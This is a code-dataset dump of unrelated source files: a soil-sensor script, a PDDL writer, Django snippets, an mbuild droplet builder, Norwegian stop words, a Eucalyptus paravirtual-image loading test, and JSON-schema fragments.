id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
12818018 |
# Main Code Contributions:
# SPDX-FileCopyrightText: 2021 Team 4160 "The Robucs" Mission Bay HighSchool
# SPDX-License-Identifier: MIT
# Some Code greatfully reused from:
# SPDX-FileCopyrightText: 2019 ladyada for Adafruit Industries
# SPDX-License-Identifier: MIT
#====================================
import time
import board
import busio
from adafruit_seesaw.seesaw import Seesaw
print("Libraries loaded")
# setup variables for sampling
#====================================
sleep_timer = 2.0
deep_sleep = 90
retries = 4
samples = 3
# setup for soil sensor
i2c = busio.I2C(scl=board.GP1, sda=board.GP0)
ss = Seesaw(i2c, addr=0x36)
# Functions
#====================================
def avg_soil(sleep_timer, samples):
print("Testing Soil. Takes 6+ seconds (or sleep_timer x samples)")
count = 0
total = 0
while count < samples:
total = total + ss.moisture_read()
time.sleep(sleep_timer)
count += 1
soil = total / samples
return (round(soil, 1))
# Main
#====================================
while True:
try:
print("Moisture:{}".format(avg_soil(sleep_timer, samples)))
except (ValueError, RuntimeError) as e:
print("Failed to get data, retrying\n", e)
time.sleep(deep_sleep)
| StarcoderdataPython |
3541410 | <filename>pddlstream/language/write_pddl.py
import re
import math
from pddlstream.language.constants import AND, OR, OBJECT, TOTAL_COST, TOTAL_TIME, is_cost, get_prefix, \
CONNECTIVES, QUANTIFIERS
from pddlstream.language.conversion import pddl_from_object, is_atom, is_negated_atom, objects_from_evaluations
from pddlstream.language.object import Object, OptimisticObject
from pddlstream.algorithms.downward import fd_from_evaluation
DEFAULT_TYPE = OBJECT # number
def pddl_parameter(param):
return '{} - {}'.format(param, DEFAULT_TYPE)
#return param
def pddl_parameters(parameters):
return ' '.join(map(pddl_parameter, parameters))
def pddl_head(name, args):
return '({})'.format(' '.join([name] + list(map(pddl_from_object, args))))
def pddl_from_evaluation(evaluation):
#if evaluation.head.function == TOTAL_COST:
# return None
head = pddl_head(evaluation.head.function, evaluation.head.args)
if is_atom(evaluation):
return head
elif is_negated_atom(evaluation):
return '(not {})'.format(head)
#value = int(evaluation.value)
value = evaluation.value # floats are fine for temporal planners
#value = int(math.ceil(evaluation.value))
return '(= {} {})'.format(head, value)
def pddl_functions(predicates):
return '\n\t\t'.join(sorted(p.pddl() for p in predicates))
def pddl_connective(literals, connective):
if not literals:
return '()'
if len(literals) == 1:
return literals[0].pddl()
return '({} {})'.format(connective, ' '.join(l.pddl() for l in literals))
def pddl_conjunction(literals):
return pddl_connective(literals, AND)
def pddl_disjunction(literals):
return pddl_connective(literals, OR)
def pddl_from_expression(expression):
if isinstance(expression, Object) or isinstance(expression, OptimisticObject):
return pddl_from_object(expression)
if isinstance(expression, str):
return expression
return '({})'.format(' '.join(map(pddl_from_expression, expression)))
##################################################
def pddl_problem(problem, domain, evaluations, goal_expression, objective=None):
objects = objects_from_evaluations(evaluations)
s = '(define (problem {})\n' \
'\t(:domain {})\n' \
'\t(:objects {})\n' \
'\t(:init \n\t\t{})\n' \
'\t(:goal {})'.format(
problem, domain,
' '.join(sorted(map(pddl_from_object, objects))), # map(pddl_parameter,
'\n\t\t'.join(sorted(filter(lambda p: p is not None,
map(pddl_from_evaluation, evaluations)))),
pddl_from_expression(goal_expression))
if objective is not None:
s += '\n\t(:metric minimize ({}))'.format(TOTAL_TIME) # TOTAL_COST | TOTAL_TIME
return s + ')\n'
def get_problem_pddl(evaluations, goal_exp, domain_pddl):
[domain_name] = re.findall(r'\(domain ([^ ]+)\)', domain_pddl)
problem_name = domain_name
problem_pddl = pddl_problem(domain_name, problem_name, evaluations, goal_exp, objective=TOTAL_TIME)
#write_pddl(domain_pddl, problem_pddl, TEMP_DIR)
return problem_pddl | StarcoderdataPython |
204042 | <filename>fechbase.py<gh_stars>1-10
class RecordsBase:
pass
class VersionBase:
pass
class VersionsBase:
pass
| StarcoderdataPython |
1860179 | <reponame>librazh/financial-analysis<filename>app/index_forecast.py
# -*- coding: utf-8 -*-
"""
TODO: Track and forecast indexes
"""
import matplotlib.pyplot as plt
from .my_logging import get_logger
from .my_tushare import get_tushare
logger = get_logger()
ts = get_tushare()
def demo(index_code):
df = ts.get_k_data(index_code, index=True, start='2018-08-01', end='2018-08-16')
fig, ax1 = plt.subplots()
color = 'tab:red'
ax1.set_xlabel('date')
ax1.set_ylabel('volume', color=color)
ax1.plot(df['date'], df['volume'], color=color)
ax1.tick_params(axis='y', labelcolor=color)
ax2 = ax1.twinx()
color = 'tab:blue'
ax2.set_ylabel('close', color=color)
ax2.plot(df['date'], df['close'], color=color)
ax2.tick_params(axis='y', labelcolor=color)
fig.tight_layout()
# plt.plot(df['date'], df['volume'], 'b-', df['date'], df['close'], 'r--')
# plt.ylabel('index')
# plt.xlabel('date')
plt.show()
if __name__ == '__main__':
demo('399006')
| StarcoderdataPython |
1623954 | # !/usr/bin/env python
# encoding:UTF-8
from django.shortcuts import render
# from dynamic_preferences.models import global_preferences
# from dynamic_preferences.registries import autodiscover
# autodiscover(True)
def home(request):
# gp = global_preferences.to_dict()
return render(request, 'home.html', {
})
| StarcoderdataPython |
3546553 | ''' Python question by HackerRank
TODO 1: "Exceptions"
You have to pass all the testcases to get a positive score.
'''
import re
# TODO 1: "Exceptions"
def exceptions_example():
number_of_tests = int(input().lstrip().rstrip())
for _ in range(int(number_of_tests)):
try:
a, b = [int(i) for i in input().lstrip().rstrip().split()]
except ValueError as e:
print("Error Code:",e)
continue
try:
print(a//b)
except ZeroDivisionError as e:
print("Error Code:",e)
# TODO 2: "Incorrect Regex"
def incorrect_regex():
number_of_tests = int(input().lstrip().rstrip())
test_str = 'QWRTYPSDFGHJKLZXCVBNMAEIOU11223344556677889900 QWRTYPSDFGHJKLZXCVBNMAEIOU11223344556677889900'
for _ in range(int(number_of_tests)):
ss = input().lstrip().rstrip()
try:
match = ''.join(re.findall(ss, test_str))
except Exception:
print('False')
else:
print('True')
if __name__ == '__main__':
incorrect_regex()
| StarcoderdataPython |
1865402 | # Generated by Django 3.0 on 2021-03-08 14:57
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('alldata', '0026_quizquestion_friend'),
]
operations = [
migrations.RemoveField(
model_name='priority',
name='id',
),
migrations.AlterField(
model_name='priority',
name='year',
field=models.IntegerField(choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4)], primary_key=True, serialize=False),
),
]
| StarcoderdataPython |
6656602 | import mbuild
import numpy as np
def get_height(r, theta):
"""
Helper function to get the height of a spherical cap
"""
return r - r * np.cos(theta * np.pi / 180)
class Droplet(mbuild.Compound):
"""
Builds a droplet on a lattice.
Parameters
----------
radius : int, default = 2
radius of the droplet in nm
angle : float, default = 90.0
contact angle of the droplet in degrees
fluid : mbuild.Compound or list of mbuild.Compound
compounds to fill the droplet with
density: float or list of float
target density for the droplet in kg/m^3
lattice: mbuild.Lattice
lattice to build droplet on
lattice_compound: mbuild.Compound
compound to build lattice with
x : float
dimension of graphene sheet in x direction in nm
y : float
dimension of graphene sheet in y direction in nm
NOTE: length of `fluid` must match length of `density`
Attributes
----------
see mbuild.Compound
"""
def __init__(self, radius=2, angle=90.0, fluid=None, density=None,
lattice=None, lattice_compound=None, x=None, y=None):
super(Droplet, self).__init__()
if fluid is None:
raise ValueError('Fluid droplet compounds must be specified')
if density is None:
raise ValueError('Fluid density must be specified (units kg/m^3)')
if x:
if x < radius * 4:
raise ValueError(
'Dimension x of sheet must be at least radius * 4')
elif x > 100:
raise ValueError(
'Dimension x of sheet must be less than 100 nm')
else:
x = radius * 4
if y:
if y < radius * 4:
raise ValueError(
'Dimension y of sheet must be at least radius * 4')
elif y > 100:
raise ValueError(
'Dimension y of sheet must be less than 100 nm')
else:
y = radius * 4
# Default to graphene lattice
if lattice is None:
if lattice_compound is not None:
raise ValueError(
'If Lattice is None, defaults to a Graphene surface. ' +
'In this case, do not specify lattice_compound.'
)
lattice_compound = mbuild.Compound(name='C')
lattice_spacing = [0.2456, 0.2456, 0.335]
angles = [90.0, 90.0, 120.0]
carbon_locations = [[0, 0, 0], [2 / 3, 1 / 3, 0]]
basis = {lattice_compound.name: carbon_locations}
lattice = mbuild.Lattice(
lattice_spacing=lattice_spacing,
angles=angles,
lattice_points=basis)
compound_dict = {lattice_compound.name: lattice_compound}
factor = np.cos(np.pi / 6) # fixes non-cubic lattice
# Estimate the number of lattice repeat units
replicate = [int(x / 0.2456), int(y / 0.2456) * (1 / factor)]
lat = lattice.populate(
compound_dict=compound_dict,
x=replicate[0],
y=replicate[1],
z=3
)
for particle in lat.particles():
if particle.xyz[0][0] < 0:
particle.xyz[0][0] += lat.periodicity[0]
lat.periodicity[1] *= factor
else:
if lattice_compound is None:
raise ValueError('Lattice compounds must be specified')
if not np.all(lattice.angles == 90.0):
raise ValueError(
'Currently, only cubic lattices are supported. ' +
'If using Graphene, do not pass in a Lattice.'
)
compound_dict = {lattice_compound.name: lattice_compound}
lat = lattice.populate(
compound_dict=compound_dict,
x=int(x/lattice.lattice_spacing[0]),
y=int(y/lattice.lattice_spacing[1]),
z=int(1.5/lattice.lattice_spacing[2]))
sheet = mbuild.clone(lat)
self.surface_height = np.max(sheet.xyz, axis=0)[2]
coords = list(sheet.periodicity)
height = get_height(radius, angle)
sphere_coords = [coords[0] / 2, coords[1] / 2, radius, radius]
sphere = mbuild.fill_sphere(
compound=fluid, sphere=sphere_coords, density=density)
to_remove = []
for child in sphere.children:
for atom_coords in child.xyz:
if height > radius:
if atom_coords[2] < height - radius:
to_remove += child
break
else:
if atom_coords[2] < height:
to_remove += child
break
sphere.remove(to_remove)
sheet.name = 'LAT'
sphere.name = 'FLD'
sphere.xyz -= [0, 0, np.min(sphere.xyz, axis=0)[2]]
sphere.xyz += [0, 0, self.surface_height + 0.3]
self.add(sheet)
self.add(sphere)
self.periodicity[0] = sheet.periodicity[0]
self.periodicity[1] = sheet.periodicity[1]
self.periodicity[2] = radius * 5
| StarcoderdataPython |
1967555 | # encoding: utf8
from __future__ import unicode_literals
STOP_WORDS = set(
"""
alle allerede alt and andre annen annet at av
bak bare bedre beste blant ble bli blir blitt bris by både
da dag de del dem den denne der dermed det dette disse drept du
eller en enn er et ett etter
fem fikk fire fjor flere folk for fortsatt fotball fra fram frankrike fredag
funnet få får fått før først første
gang gi gikk gjennom gjorde gjort gjør gjøre god godt grunn gå går
ha hadde ham han hans har hele helt henne hennes her hun hva hvor hvordan
hvorfor
i ifølge igjen ikke ingen inn
ja jeg
kamp kampen kan kl klart kom komme kommer kontakt kort kroner kunne kveld
kvinner
la laget land landet langt leder ligger like litt løpet lørdag
man mandag mange mannen mars med meg mellom men mener menn mennesker mens mer
millioner minutter mot msci mye må mål måtte
ned neste noe noen nok norge norsk norske ntb ny nye nå når
og også om onsdag opp opplyser oslo oss over
personer plass poeng politidistrikt politiet president prosent på
regjeringen runde rundt russland
sa saken samme sammen samtidig satt se seg seks selv senere september ser sett
siden sier sin sine siste sitt skal skriver skulle slik som sted stedet stor
store står sverige svært så søndag
ta tatt tid tidligere til tilbake tillegg tirsdag to tok torsdag tre tror
tyskland
under usa ut uten utenfor
vant var ved veldig vi videre viktig vil ville viser vår være vært
å år
ønsker
""".split()
)
| StarcoderdataPython |
6589013 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Software License Agreement (BSD License)
#
# Copyright (c) 2009-2011, Eucalyptus Systems, Inc.
# All rights reserved.
#
# Redistribution and use of this software in source and binary forms, with or
# without modification, are permitted provided that the following conditions
# are met:
#
# Redistributions of source code must retain the above
# copyright notice, this list of conditions and the
# following disclaimer.
#
# Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the
# following disclaimer in the documentation and/or other
# materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
from eutester.eutestcase import EutesterTestCase
from testcases.cloud_user.images.imageutils import ImageUtils
from eucaops import Eucaops
from eutester import Eutester
from eucaops.ec2ops import ResourceNotFoundException
import os
import time
class Load_Pv_Image(EutesterTestCase):
def __init__(self, tester=None, **kwargs):
self.emi = None
self.eki = None
self.eri = None
self.setuptestcase()
self.setup_parser(testname='load_pv_image.py',
description='Loads an paravirtual image from a set of '
'Kernel, Ramdisk, and image by remote URLs or filepaths',
emi=False,
testlist=False)
self.parser.add_argument('--kernel_image_url',
help='URL containing the kernel image to be downloaded to the'
' worker machine and used in the pv image',
default=None)
self.parser.add_argument('--kernelfilepath',
help='An existing file path on the worker machine containing '
'the kernel disk image to use', default=None)
self.parser.add_argument('--ramdisk_image_url',
help='URL containing the initrd image to be downloaded to the'
' worker machine and used in the pv image',
default=None)
self.parser.add_argument('--ramdiskfilepath',
help='An existing file path on the worker machine containing '
'the ramdisk image to use', default=None)
self.parser.add_argument('--disk_image_url',
help='URL containing the image to be downloaded to the worker'
' machine and used for the pv disk image',
default=None)
self.parser.add_argument('--diskfilepath',
help='An existing file path on the worker machine containing '
'the image to use', default=None)
self.parser.add_argument('--workerip',dest='worker_machine',
help='The ip/hostname of the machine that the operation will '
'be performed on', default=None)
self.parser.add_argument('--worker_username',dest='worker_username',
help='The username of the machine that the operation will be '
'performed on, default:"root"', default='root')
self.parser.add_argument('--worker_password',dest='worker_password',
help='The password of the machine that the operation will be '
'performed on', default=None)
self.parser.add_argument('--worker_keypath',dest='worker_keypath',
help='The ssh keypath of the machine that the operation '
'will be performed on', default=None)
self.parser.add_argument('--destpath',
help='The path on the workip, that this operation will be '
'performed on', default='/disk1/storage')
self.parser.add_argument('--urlpass', dest='wget_password',
help='Password needed to retrieve remote url', default=None)
self.parser.add_argument('--urluser',dest='wget_user',
help='Username needed to retrieve remote url', default=None)
self.parser.add_argument('--interbundletime',dest='inter_bundle_timeout',
help='Inter-bundle timeout', default=120)
self.parser.add_argument('--bucket',dest='bucketname', help='bucketname', default=None)
self.parser.add_argument('--overwrite',
help='Will overwrite files in matching work dir on worker'
' machine if found', action='store_true', default=False)
self.parser.add_argument('--no_existing_images', action='store_true', default=False,
help='If set this will not use existing images found on the system'
'sharing the same image name(s) for kernel(eki) '
'and ramdisk(eri) images when building the final image(EMI)')
self.parser.add_argument('--time_per_gig',
help='Time allowed per image size in GB before timing out. '
'Default:300 seconds', default=300)
self.parser.add_argument('--remove_created_images',
help='Flag if set will attempt to deregister'
'images this test created, default:False',
action='store_true', default=False)
self.get_args()
if (not self.args.disk_image_url and not self.args.diskfilepath) or \
(self.args.disk_image_url and self.args.diskfilepath):
raise ValueError('Must provide "either" a url (image_url) to a disk image or the '
'file path to an existing image on the worker '
'machine (imagefilepath)')
if (not self.args.kernel_image_url and not self.args.kernelfilepath) or \
(self.args.kernel_image_url and self.args.kernelfilepath):
raise ValueError('Must provide "either" a url (kernel_image_url) to a kernel '
'image or the file path to an existing image on the worker '
'machine (kernelfilepath)')
if (not self.args.ramdisk_image_url and not self.args.ramdiskfilepath) or \
(self.args.ramdisk_image_url and self.args.ramdiskfilepath):
raise ValueError('Must provide "either" a url (ramdisk_image_url) to a '
'ramdisk image or the file path to an existing image on the worker '
'machine (ramdiskfilepath)')
self.args.worker_password = self.args.worker_password or self.args.password
self.args.worker_keypath = self.args.worker_keypath or self.args.keypair
self.args.virtualization_type = 'paravirtual'
if tester is None:
self.tester = Eucaops(config_file=self.args.config_file, password=self.args.password)
else:
self.tester = tester
Eutester._EUTESTER_FORCE_ANSI_ESCAPE = self.args.use_color
self.args.tester = self.tester
# Allow __init__ to get args from __init__'s kwargs or through command line parser...
for kw in kwargs:
print 'Setting kwarg:'+str(kw)+" to "+str(kwargs[kw])
self.set_arg(kw ,kwargs[kw])
self.show_args()
#self.args.platform = 'Linux'
#Create an ImageUtils helper from the arguments provided in this self...
self.image_utils = self.do_with_args(ImageUtils)
def do_kernel_image(self):
"""
Description:
Registers a kernel image with the cloud for use in creating an EMI.
Attempts to either use an existing file path or download from a URL (whichever has been
provided by the user) to a 'worker machine'. The worker machine will default to the CLC if
another host is not provided.
The image is bundled, uploaded and registered using euca2ools on the worker machine.
"""
size = None
image_utils = self.image_utils
kernelfilepath = self.args.kernelfilepath
kernel_image_url = self.args.kernel_image_url
filename = os.path.basename(kernelfilepath or kernel_image_url)
imagename = filename[0:20] + '_by_eutester'
try:
image = self.tester.get_emi(emi='ki', filters={'name':imagename})
except ResourceNotFoundException:
image = None
if image:
if self.args.no_existing_images:
x = 0
while True:
try:
x += 1
newname = "{0}_{1}".format(imagename, x)
self.tester.get_emi(emi='ki', filters={'name':newname})
except ResourceNotFoundException:
imagename = newname
break
else:
self.status('Found existing EKI image:"{0}" with name: "{1}"'
.format(image.id, image.name))
self.eki = image
self.tester.show_image(self.eki,verbose=True)
return self.eki
if not kernelfilepath:
destpath = self.args.destpath
size, kernelfilepath = image_utils.wget_image(url=kernel_image_url,
destpath=destpath)
manifest = image_utils.euca2ools_bundle_image(path=kernelfilepath,
destination=self.args.destpath)
upmanifest = image_utils.euca2ools_upload_bundle(manifest=manifest,
bucketname=imagename + '_eutester_pv')
eki = image_utils.euca2ools_register(manifest = upmanifest, name= imagename)
# Make sure this image can be retrieved from the system...
image = self.tester.get_emi(eki, state=None)
assert image.id == eki, 'Image retrieved from system did not match the test image id. ' \
'Fix the test?'
# Add some tags to inform the cloud admin/users where this image came from...
image.add_tag(key='Created by eutester load_pv_image test')
if size is not None:
image.add_tag(key='size', value=str(size))
if kernel_image_url:
image.add_tag(key='source', value=kernel_image_url)
image.update()
self.eki = image
self.tester.show_image(self.eki,verbose=True)
return self.eki
def do_ramdisk_image(self):
"""
Description:
Registers a ramdisk image with the cloud for use in creating an EMI.
Attempts to either use an existing file path or download from a URL (whichever has been
provided by the user) to a 'worker machine'. The worker machine will default to the CLC if
another host is not provided.
The image is bundled, uploaded and registered using euca2ools on the worker machine.
"""
size = None
image_utils = self.image_utils
ramdisk_image_url = self.args.ramdisk_image_url
ramdiskfilepath = self.args.ramdiskfilepath
filename = os.path.basename(ramdiskfilepath or ramdisk_image_url)
imagename =filename[0:20] + '_by_eutester'
try:
image = self.tester.get_emi(emi='ri', filters={'name':imagename})
except ResourceNotFoundException:
image = None
if image:
if self.args.no_existing_images:
x = 0
while True:
try:
x += 1
newname = "{0}_{1}".format(imagename, x)
self.tester.get_emi(emi='ri', filters={'name':newname})
except ResourceNotFoundException:
imagename = newname
break
else:
self.status('Found existing ERI image:"{0}" with name: "{1}"'
.format(image.id, image.name))
self.eri = image
self.tester.show_image(self.eri,verbose=True)
return self.eri
if not ramdiskfilepath:
destpath = self.args.destpath
size, ramdiskfilepath = image_utils.wget_image(url=ramdisk_image_url,
destpath=destpath)
manifest = image_utils.euca2ools_bundle_image(path=ramdiskfilepath,
destination=self.args.destpath)
upmanifest = image_utils.euca2ools_upload_bundle(manifest=manifest,
bucketname=imagename + '_eutester_pv')
eri = image_utils.euca2ools_register(manifest = upmanifest, name= imagename)
# Make sure this image can be retrieved from the system...
image = self.tester.get_emi(eri, state=None)
assert image.id == eri, 'Image retrieved from system did not match the test image id. ' \
'Fix the test?'
# Add some tags to inform the cloud admin/users where this image came from...
image.add_tag(key='Created by eutester load_pv_image test')
if size is not None:
image.add_tag(key='size', value=str(size))
if ramdisk_image_url:
image.add_tag(key='source', value=ramdisk_image_url)
image.update()
self.eri = image
self.tester.show_image(self.eri, verbose=True)
return self.eri
def do_image(self):
"""
Description:
Registers an image with the cloud using the ERI, and EKI found or created by this test.
Attempts to either use an existing file path or download from a URL (whichever has been
provided by the user) to a 'worker machine'. The worker machine will default to the CLC if
another host is not provided.
The image is bundled, uploaded and registered using euca2ools on the worker machine.
"""
size = None
image_utils = self.image_utils
diskfilepath = self.args.diskfilepath
disk_image_url = self.args.disk_image_url
filename = os.path.basename(diskfilepath or disk_image_url)
imagename = filename[0:20] + '_by_eutester'
if not diskfilepath:
destpath = self.args.destpath
size, diskfilepath = image_utils.wget_image(url=disk_image_url,
destpath=destpath)
try:
self.tester.get_emi(emi='', filters={'name':imagename}, state=None)
except ResourceNotFoundException:
pass
else:
# imagename is already taken.
# Always create a new EMI, so make sure we increment the image name...
x = 0
while True:
try:
x += 1
newname = "{0}_{1}".format(imagename, x)
self.tester.get_emi(emi='', filters={'name':newname})
self.debug('image name:"{0}" is already in use...'.format(newname))
except ResourceNotFoundException:
imagename = newname
self.debug('Found an unused image name. Using name:"{0}"'.format(imagename))
break
manifest = image_utils.euca2ools_bundle_image(path=diskfilepath,
destination=self.args.destpath)
upmanifest = image_utils.euca2ools_upload_bundle(manifest=manifest,
bucketname=imagename + '_eutester_pv')
emi = image_utils.euca2ools_register(manifest = upmanifest,
name= imagename,
kernel=self.eki.id,
ramdisk=self.eri.id,
description='"created by eutester '
'load_pv_image test"',
virtualization_type='paravirtual',
arch='x86_64'
)
# Make sure this image can be retrieved from the system...
image = self.tester.get_emi(emi, state=None)
assert image.id == emi, 'Image retrieved from system did not match the test image id. ' \
'Fix the test?'
# Add some tags to inform the cloud admin/users where this image came from...
image.add_tag(key='eutester-created', value='Created by eutester load_pv_image test')
if size is not None:
image.add_tag(key='size', value=str(size))
if disk_image_url:
image.add_tag(key='source', value=disk_image_url)
image.update()
self.emi = image
self.tester.show_image(self.emi, verbose=True)
return self.emi
def make_image_public(self):
"""
Description:
Attempts to set the launch permissions to ALL, making the image public.
"""
emi = self.tester.get_emi(self.emi, state=None)
emi.set_launch_permissions(group_names=['all'])
emi.update()
self.tester.show_image(emi)
def show_images(self):
'''
Attempts to fetch the EMI, EKI, and ERI created by this test and display them in table
format to the user.
'''
self.debug('\nCreate the following Image(s)...\n')
images = []
if self.emi:
self.emi.update()
images.append(self.emi)
if self.eri:
self.eri.update()
images.append(self.eri)
if self.eki:
self.eki.update()
images.append(self.eki)
if not images:
self.debug('No IMAGES were created?')
else:
self.tester.show_images(images=images, verbose=True)
if not self.emi and self.eri and self.eki:
self.tester.critical('\nTEST FAILED: Could not find all images (EMI, ERI, EKI)')
def run_new_pv_image(self):
"""
Description:
Attempts to run an instance from the newly created PV image.
Will attempt to ping/ssh into the instance once running and execute the 'uptime' command.
"""
self.reservation = None
### Add and authorize a group for the instance
self.group = self.tester.add_group('load_pv_image_test')
self.tester.authorize_group(self.group, port=22)
self.tester.authorize_group(self.group, protocol='icmp', port=-1)
### Generate a keypair for the instance
localkeys = self.tester.get_all_current_local_keys()
if localkeys:
self.keypair = localkeys[0]
self.keypair_name = self.keypair.name
else:
self.keypair_name = "load_pv_test_keypair" + str(int(time.time()))
self.keypair = self.tester.add_keypair(self.keypair_name)
try:
size = int(self.emi.tags.get('size', 0)) * int(self.args.time_per_gig)
timeout = size or 300
instance = self.tester.run_image(image=self.emi, keypair=self.keypair,
group=self.group, timeout=timeout)[0]
instance.sys('uptime', code=0)
self.status("Run new PV image PASSED")
finally:
self.emi.update()
self.debug('Image states after run attempt:')
self.show_images()
def clean_method(self):
"""
Description:
Attempts to clean up resources/artifacts created during this test.
This method will not clean up the images created in this
test. Will attempt to delete/terminate instances, keypairs, etc..
"""
tester = self.tester
assert isinstance(tester, Eucaops)
tester.cleanup_artifacts(images=self.args.remove_created_images)
if __name__ == "__main__":
testcase = Load_Pv_Image()
# Create a single testcase to wrap and run the image creation tasks.
test1 = testcase.create_testunit_from_method(testcase.do_kernel_image)
test2 = testcase.create_testunit_from_method(testcase.do_ramdisk_image)
test3 = testcase.create_testunit_from_method(testcase.do_image)
test4 = testcase.create_testunit_from_method(testcase.make_image_public)
test5 = testcase.create_testunit_from_method(testcase.run_new_pv_image)
testlist = [test1, test2, test3, test4, test5]
result = testcase.run_test_case_list(testlist,
eof=True, clean_on_exit=True,
printresults=True)
if result:
testcase.errormsg('TEST FAILED WITH RESULT:{0}'.format(result))
else:
testcase.status('TEST PASSED')
exit(result)
| StarcoderdataPython |
1925561 | {'type': 'string'}
{'type': 'string'}
{'type': 'string'}
{'type': 'string'}
{'type': 'number', 'format': 'int'}
{'type': 'string', 'description': 'The id used by the provider'}
{'type': 'string', 'format': 'url'}
{'type': 'string', 'format': 'url'}
['http://purl.org/dc/elements/1.1/', 'publisher', 'dc']
{'type': 'string', 'format': 'url', 'description': '[http://purl.org/dc/elements/1.1/,publisher,dc]The base url for the provider'}
{'$ref': '#/definitions/Popularity'}
{'type': 'number', 'format': 'int'}
{'type': 'number', 'format': 'int'}
{'type': 'number', 'format': 'int'}
{'type': 'number', 'format': 'int'}
['http://xmlns.com/foaf/spec/#', 'term_nick', 'foaf']
{'type': 'string', 'description': '[http://xmlns.com/foaf/spec/#,term_nick,foaf] The username'}
{'type': 'string', 'description': 'The sha256 of the password'}
['http://xmlns.com/foaf/spec/#', 'term_mbox', 'foaf']
{'type': 'string', 'description': '[http://xmlns.com/foaf/spec/#,term_mbox,foaf] Email addres'}
['http://purl.org/media#', 'duration', 'media']
{'type': 'array', 'description': '[http://purl.org/media#,duration,media]The categories for this image'}
{'type': 'string', 'format': 'url'}
{'type': 'string', 'description': 'The name of the quality i.e High, Low, Poor'}
{'type': 'integer', 'description': 'An unique identifier'}
['http://purl.org/dc/terms/', 'accrualPeriodicity', 'dc']
{'type': 'string', 'description': '[http://purl.org/dc/terms/,accrualPeriodicity,dc]The base url for the provider'}
{'type': 'string'}
{'type': 'string'}
['http://purl.org/media#', 'duration', 'media']
{'type': 'array', 'description': '[http://purl.org/media#,duration,media]The categories for this image'}
{'type': 'string'}
{'type': 'number', 'format': 'float', 'description': 'In seconds'}
{'type': 'string', 'format': 'date'}
{'type': 'string', 'format': 'date'}
{'type': 'boolean'}
{'type': 'string', 'description': "If the provider does not use id's for categories use category name"}
['http://purl.org/dc/terms/', 'creator', 'dc']
{'$ref': '#/definitions/Author', 'description': '[http://purl.org/dc/terms/,creator,dc] The creator of the content'}
['http://purl.org/dc/elements/1.1/', 'publisher', 'dc']
{'type': 'string', 'format': 'url', 'description': '[http://purl.org/dc/elements/1.1/,publisher,dc]The base url for the provider'}
{'type': 'array', 'items': {'type': 'string'}}
{'type': 'array', 'items': {'$ref': '#/definitions/AudioUrl'}}
{'type': 'integer', 'description': 'An unique identifier'}
['http://purl.org/dc/elements/1.1/', 'publisher', 'dc']
{'type': 'string', 'format': 'url', 'description': '[http://purl.org/dc/elements/1.1/,publisher,dc]The base url for the provider'}
['http://purl.org/dc/terms/', 'creator', 'dc']
{'$ref': '#/definitions/Author', 'description': '[http://purl.org/dc/terms/,creator,dc] The creator of the content'}
['http://purl.org/dc/elements/1.1/', 'title', 'dc']
{'type': 'string', 'description': '[http://purl.org/dc/elements/1.1/,title,dc]'}
['http://purl.org/media#', 'duration', 'media']
{'type': 'array', 'description': '[http://purl.org/media#,duration,media]The categories for this image'}
['http://purl.org/dc/elements/1.1/', 'description', 'dc']
{'type': 'string', 'description': '[http://purl.org/dc/elements/1.1/,description,dc]'}
{'type': 'string'}
{'type': 'string'}
['http://purl.org/dc/elements/1.1/', 'created', 'dc']
{'type': 'string', 'format': 'date', 'description': '[http://purl.org/dc/elements/1.1/,created,dc]'}
{'type': 'integer', 'description': 'An unique identifier'}
{'type': 'string', 'description': 'The ID for the image'}
['http://purl.org/dc/elements/1.1/', 'title', 'dc']
{'type': 'string', 'description': '[http://purl.org/dc/elements/1.1/,title,dc]'}
['http://purl.org/media#', 'duration', 'media']
{'type': 'array', 'description': '[http://purl.org/media#,duration,media]The categories for this image'}
['http://purl.org/dc/elements/1.1/', 'description', 'dc']
{'type': 'string', 'description': '[http://purl.org/dc/elements/1.1/,description,dc]'}
['http://purl.org/dc/terms/', 'creator', 'dc']
{'$ref': '#/definitions/Author', 'description': '[http://purl.org/dc/terms/,creator,dc] The creator of the content'}
['http://purl.org/dc/elements/1.1/', 'created', 'dc']
{'type': 'integer', 'description': '[http://purl.org/dc/elements/1.1/,created,dc] Time inserted into the gallery, epoch time'}
{'type': 'string', 'description': 'Image MIME type.'}
{'type': 'boolean', 'description': 'is the image animated'}
{'type': 'integer', 'description': 'The width of the image in pixels'}
{'type': 'integer', 'description': 'The height of the image in pixels'}
{'type': 'integer', 'description': 'The size of the image in bytes'}
{'type': 'integer', 'description': 'The number of image views'}
{'type': 'string', 'description': 'The direct link to the the image. (Note: if fetching an animated GIF that was over 20MB in original size, a .gif thumbnail will be returned)'}
{'type': 'string', 'description': "The .gifv link. Only available if the image is animated and type is 'image/gif'."}
{'type': 'string', 'description': "The direct link to the .mp4. Only available if the image is animated and type is 'image/gif'."}
{'type': 'integer', 'description': 'The Content-Length of the .mp4. Only available if the image is animated and type is image/gif. Note that a zero value (0) is possible if the video has not yet been generated'}
{'type': 'string', 'description': "The current user's vote on the album. null if not signed in or if the user hasn't voted on it."}
{'type': 'boolean', 'description': 'Indicates if the image has been marked as nsfw or not. Defaults to null if information is not available.'}
{'type': 'string', 'description': 'Topic of the gallery image.'}
